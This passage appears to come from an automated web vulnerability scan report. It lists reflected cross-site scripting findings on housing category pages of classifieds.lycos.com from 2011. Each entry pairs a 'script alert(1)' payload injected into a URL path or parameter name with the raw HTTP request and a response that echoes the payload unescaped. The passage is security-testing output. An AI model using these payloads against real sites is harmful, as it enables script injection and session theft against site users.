<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c99"><script>alert(1)</script>f65348401a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent46c99"><script>alert(1)</script>f65348401a7/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent46c99"><script>alert(1)</script>f65348401a7/?mobile=1" rel="nofollow"> ...[SNIP]...
1.48. http://classifieds.lycos.com/housing-rent/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09c9"><script>alert(1)</script>26479ec3b01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:58:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92d68"><script>alert(1)</script>3441bd28421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:16:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:23 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/?mobile=1" rel="nofollow"> ...[SNIP]...
1.50. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-commercial-office_space/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db56c"><script>alert(1)</script>b3c0518ee36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:15:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:46 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 52962
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d27"><script>alert(1)</script>55e8d8a9b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/?mobile=1" rel="nofollow"> ...[SNIP]...
1.52. http://classifieds.lycos.com/housing-sale-commercial-retail/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-commercial-retail/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45891"><script>alert(1)</script>6e1973139bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:15:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b172"><script>alert(1)</script>ee6728714e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/?mobile=1" rel="nofollow"> ...[SNIP]...
1.54. http://classifieds.lycos.com/housing-sale-condo/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-condo/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bd5"><script>alert(1)</script>cc3baf59798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc5c"><script>alert(1)</script>96d5591b8e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/?mobile=1" rel="nofollow"> ...[SNIP]...
1.56. http://classifieds.lycos.com/housing-sale-foreclosure/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-foreclosure/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772a4"><script>alert(1)</script>0863b3ad0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd118"><script>alert(1)</script>76c0f84d788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/?mobile=1" rel="nofollow"> ...[SNIP]...
1.58. http://classifieds.lycos.com/housing-sale-home/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-home/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e07"><script>alert(1)</script>bba54ed9fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c48"><script>alert(1)</script>602a02817cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/?mobile=1" rel="nofollow"> ...[SNIP]...
1.60. http://classifieds.lycos.com/housing-sale-land/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-land/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef73"><script>alert(1)</script>1760df3c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:15:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84f1e"><script>alert(1)</script>ea2f165b766 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/?mobile=1" rel="nofollow"> ...[SNIP]...
1.62. http://classifieds.lycos.com/housing-sale-multi_family/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-multi_family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657fc"><script>alert(1)</script>e72cbec7713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:15:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1&mobile=1" rel="nofollow"> ...[SNIP]...
